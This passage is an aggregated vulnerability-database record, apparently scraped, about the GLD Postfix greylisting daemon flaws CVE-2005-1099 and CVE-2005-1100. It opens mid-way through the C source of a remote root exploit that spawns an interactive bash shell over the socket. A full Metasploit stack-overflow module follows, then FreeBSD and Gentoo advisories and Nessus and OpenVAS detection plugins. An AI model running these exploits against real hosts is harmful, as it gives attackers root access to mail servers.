error\");\r\n\t\treturn(-1);\r\n\t}\r\n \r\n\tx82_addr.sin_family=AF_INET;\r\n\tx82_addr.sin_port=htons(port);\r\n\tx82_addr.sin_addr=*((struct in_addr *)he->h_addr);\r\n\tbzero(&(x82_addr.sin_zero),8);\r\n \r\n\tif(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)\r\n\t{\r\n\t\tperror(\" # connect() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\treturn(sock);\r\n}\r\n\r\nvoid conn_shell(int sock)\r\n{\r\n\tint pckt;\r\n\tchar *cmd=\"uname -a;id;export TERM=vt100;exec bash -i\\n\";\r\n\tchar rbuf[1024];\r\n\tfd_set rset;\r\n\tmemset((char *)rbuf,0,1024);\r\n \r\n\tfprintf(stdout,\" #\\n # Kill two bird with one stone!\\n\");\r\n\tfprintf(stdout,\" # OK, It's Rootshell\\n #\\n\\n\");\r\n\tsend(sock,cmd,strlen(cmd),0);\r\n\r\n\twhile(1)\r\n\t{\r\n\t\tfflush(stdout);\r\n\t\tFD_ZERO(&rset);\r\n\t\tFD_SET(sock,&rset);\r\n\t\tFD_SET(STDIN_FILENO,&rset);\r\n\t\tselect(sock+1,&rset,NULL,NULL,NULL);\r\n\t\r\n\t\tif(FD_ISSET(sock,&rset))\r\n\t\t{\r\n\t\t\tpckt=read(sock,rbuf,1024);\r\n\t\t\tif(pckt<=0)\r\n\t\t\t{\r\n\t\t\t\tfprintf(stdout,\" #\\n # Happy Exploit !\\n #\\n\\n\");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\trbuf[pckt]=0;\r\n\t\t\tprintf(\"%s\",rbuf);\r\n\t\t}\r\n\t\tif(FD_ISSET(STDIN_FILENO,&rset))\r\n\t\t{\r\n\t\t\tpckt=read(STDIN_FILENO,rbuf,1024);\r\n\t\t\tif(pckt>0)\r\n\t\t\t{\r\n\t\t\t\trbuf[pckt]=0;\r\n\t\t\t\twrite(sock,rbuf,pckt);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid banrl()\r\n{\r\n\tfprintf(stdout,\"\\n #\\n # 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit\\n\");\r\n\tfprintf(stdout,\" # szoahc(at)hotmail(dot)com\\n #\\n\\n\");\r\n}\r\n\r\nvoid usage(char *args)\r\n{\r\n\tint i;\r\n\tfprintf(stdout,\" Usage: %s -options arguments\\n\\n\",args);\r\n\tfprintf(stdout,\"\\t-r [retloc] - .dtors address.\\n\");\r\n\tfprintf(stdout,\"\\t-s [shell] - shellcode address.\\n\");\r\n\tfprintf(stdout,\"\\t-f [flag num] - $-flag count.\\n\");\r\n\tfprintf(stdout,\"\\t-h [host] - target hostname.\\n\");\r\n\tfprintf(stdout,\"\\t-t [type num] - target number.\\n\");\r\n\tfprintf(stdout,\"\\t-i - help information.\\n\\n\");\r\n\r\n\tfprintf(stdout,\" - Target Type Number List -\\n\\n\");\r\n\tfor(i=0;platform[i].os_type!=NULL;i++)\r\n\t{\r\n\t\tfprintf(stdout,\" {%d} : %s\\n\",i,platform[i].os_type);\r\n\t}\r\n\tfprintf(stdout,\"\\n Example: %s -t 0 -h localhost\\n\",args);\r\n\tfprintf(stdout,\" Example: %s -r 0x82828282 -s 0x82828282 -f 15\\n\\n\",args);\r\n\texit(0);\r\n}\r\n\r\n/* eox */\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25392/"}], "metasploit": [{"lastseen": "2018-12-13T05:29:24", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.", "reporter": "Rapid7", "published": "2008-06-07T02:16:34", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/gld_postfix.rb", "type": "metasploit", "title": "GLD (Greylisting Daemon) Postfix Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1099"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-11-08T16:00:24", "metasploitReliability": "Good", "id": "MSF:EXPLOIT/LINUX/MISC/GLD_POSTFIX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in the Salim Gasmi\n GLD <= 1.4 greylisting daemon for Postfix. By sending an\n overly long string the stack can be overwritten.\n },\n 'Author'\t=> [ 'aushack' ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'linux',\n 'References'\t=>\n [\n [ 'CVE', '2005-1099' ],\n [ 'OSVDB', '15492' ],\n [ 'BID', '13129' ],\n [ 'EDB', '934' ]\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20=\",\n 'StackAdjustment' => -3500,\n },\n 'Targets'\t=>\n [\n [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Apr 12 2005'\n ))\n\n register_options(\n [\n Opt::RPORT(2525)\n ],\n self.class\n )\n end\n\n def exploit\n connect\n\n sploit = \"sender=\"+ payload.encoded + \"\\r\\n\"\n sploit << \"client_address=\" + [target['Ret']].pack('V') * 300 + \"\\r\\n\\r\\n\"\n\n sock.put(sploit)\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/gld_postfix.rb"}], "freebsd": [{"lastseen": "2018-08-31T01:15:59", "references": ["http://marc.theaimsgroup.com/?l=bugtraq&m=111339935903880", "http://marc.theaimsgroup.com/?l=bugtraq&m=111342432325670"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gld", "operator": "lt"}], "description": "\nGld has been found vulnerable to multiple buffer overflows as\n\t well as multiple format string vulnerabilities.\n\nAn attacker could exploit this vulnerability to execute\n\t arbitrary code with the permissions of the user running Gld,\n\t the default user being root.\n\nThe FreeBSD port defaults to running gld as the root user.\n\t The risk of exploitation can be minimized by making gld\n\t listen on the loopback address only, or configure it to only\n\t accept connections from trusted smtp servers.\n", "edition": 3, "reporter": "FreeBSD", "published": "2005-04-12T00:00:00", "title": "gld -- format string and buffer overflow vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "modified": "2005-04-12T00:00:00", "id": "6C2D4F29-AF3E-11D9-837D-000E0C2E438A", "href": "https://vuxml.freebsd.org/freebsd/6c2d4f29-af3e-11d9-837d-000e0c2e438a.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-11-22T03:10:09", "references": ["https://marc.info/?l=bugtraq&m=111342432325670", "http://www.nessus.org/u?0eecf6b3", "https://marc.info/?l=bugtraq&m=111339935903880"], "pluginID": "18974", "description": "Gld has been found vulnerable to multiple buffer overflows as well as multiple format string vulnerabilities.\n\nAn attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root.\n\nThe FreeBSD port defaults to running gld as the root user. The risk of exploitation can be minimized by making gld listen on the loopback address only, or configure it to only accept connections from trusted smtp servers.", "edition": 6, "reporter": "Tenable", "published": "2005-07-13T00:00:00", "title": "FreeBSD : gld -- format string and buffer overflow vulnerabilities (6c2d4f29-af3e-11d9-837d-000e0c2e438a)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "modified": "2018-11-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:gld"], "id": "FREEBSD_PKG_6C2D4F29AF3E11D9837D000E0C2E438A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18974", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18974);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/21 10:46:30\");\n\n script_cve_id(\"CVE-2005-1099\", \"CVE-2005-1100\");\n script_bugtraq_id(13129, 13133);\n\n script_name(english:\"FreeBSD : gld -- format string and buffer overflow vulnerabilities (6c2d4f29-af3e-11d9-837d-000e0c2e438a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Gld has been found vulnerable to multiple buffer overflows as well as\nmultiple format string vulnerabilities.\n\nAn attacker could exploit this vulnerability to execute arbitrary code\nwith the permissions of the user running Gld, the default user being\nroot.\n\nThe FreeBSD port defaults to running gld as the root user. The risk of\nexploitation can be minimized by making gld listen on the loopback\naddress only, or configure it to only accept connections from trusted\nsmtp servers.\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=111339935903880\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=111339935903880\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=111342432325670\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=111342432325670\"\n );\n # https://vuxml.freebsd.org/freebsd/6c2d4f29-af3e-11d9-837d-000e0c2e438a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0eecf6b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'GLD (Greylisting Daemon) Postfix Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gld\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"gld<1.5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:33:43", "references": ["http://securitytracker.com/alerts/2005/Apr/1013678.html", "https://security.gentoo.org/glsa/200504-10"], "pluginID": "18043", "description": "The remote host is affected by the vulnerability described in GLSA-200504-10 (Gld: Remote execution of arbitrary code)\n\n dong-hun discovered several buffer overflows in server.c, as well as several format string vulnerabilities in cnf.c.\n Impact :\n\n An attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root.\n Workaround :\n\n There is no known workaround at this time.", "edition": 5, "reporter": "Tenable", "published": "2005-04-14T00:00:00", "title": "GLSA-200504-10 : Gld: Remote execution of arbitrary code", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:gld"], "id": "GENTOO_GLSA-200504-10.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18043", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200504-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18043);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-1099\", \"CVE-2005-1100\");\n script_xref(name:\"GLSA\", value:\"200504-10\");\n\n script_name(english:\"GLSA-200504-10 : Gld: Remote execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200504-10\n(Gld: Remote execution of arbitrary code)\n\n dong-hun discovered several buffer overflows in server.c, as well as\n several format string vulnerabilities in cnf.c.\n \nImpact :\n\n An attacker could exploit this vulnerability to execute arbitrary code\n with the permissions of the user running Gld, the default user being\n root.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://securitytracker.com/alerts/2005/Apr/1013678.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200504-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Gld users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-filter/gld-1.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'GLD (Greylisting Daemon) Postfix Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gld\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-filter/gld\", unaffected:make_list(\"ge 1.5\"), vulnerable:make_list(\"le 1.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Gld\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:14", "references": [], "pluginID": "52130", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "FreeBSD Ports: gld", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "modified": "2016-09-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52130", "id": "OPENVAS:52130", "sourceData": "#\n#VID 6c2d4f29-af3e-11d9-837d-000e0c2e438a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: gld\n\nCVE-2005-1099\nMultiple buffer overflows in the HandleChild function in server.c in\nGreylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a\nnetwork interface, allow remote attackers to execute arbitrary code.\n\nCVE-2005-1100\nFormat string vulnerability in the ErrorLog function in cnf.c in\nGreylisting daemon (GLD) 1.3 and 1.4 allows remote attackers to\nexecute arbitrary code via format string specifiers in data that is\npassed directly to syslog.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=111339935903880\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=111342432325670\nhttp://www.vuxml.org/freebsd/6c2d4f29-af3e-11d9-837d-000e0c2e438a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52130);\n script_version(\"$Revision: 4118 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-20 07:32:38 +0200 (Tue, 20 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-1099\", \"CVE-2005-1100\");\n script_bugtraq_id(13129,13133);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: gld\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"gld\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.5\")<0) {\n txt += 'Package gld version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:44", "references": [], "pluginID": "54912", "description": "The remote host is missing updates announced in\nadvisory GLSA 200504-10.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200504-10 (Gld)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54912", "id": "OPENVAS:54912", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Gld contains several serious vulnerabilities, potentially resulting in the\nexecution of arbitrary code as the root user.\";\ntag_solution = \"All Gld users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-filter/gld-1.5'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200504-10\nhttp://bugs.gentoo.org/show_bug.cgi?id=88904\nhttp://securitytracker.com/alerts/2005/Apr/1013678.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200504-10.\";\n\n \n\nif(description)\n{\n script_id(54912);\n script_cve_id(\"CVE-2005-1099\",\"CVE-2005-1100\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200504-10 (Gld)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"mail-filter/gld\", unaffected: make_list(\"ge 1.5\"), vulnerable: make_list(\"le 1.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:59", "references": ["http://securitytracker.com/alerts/2005/Apr/1013678.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1100", "https://bugs.gentoo.org/show_bug.cgi?id=88904", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1099"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.4", "packageName": "mail-filter/gld", "packageFilename": "UNKNOWN", "arch": "all", "operator": "le"}], "description": "### Background\n\nGld is a standalone greylisting server for Postfix. \n\n### Description\n\ndong-hun discovered several buffer overflows in server.c, as well as several format string vulnerabilities in cnf.c. \n\n### Impact\n\nAn attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Gld users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-filter/gld-1.5\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2005-04-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Gld: Remote execution of arbitrary code", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "modified": "2006-05-22T00:00:00", "id": "GLSA-200504-10", "href": "https://security.gentoo.org/glsa/200504-10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
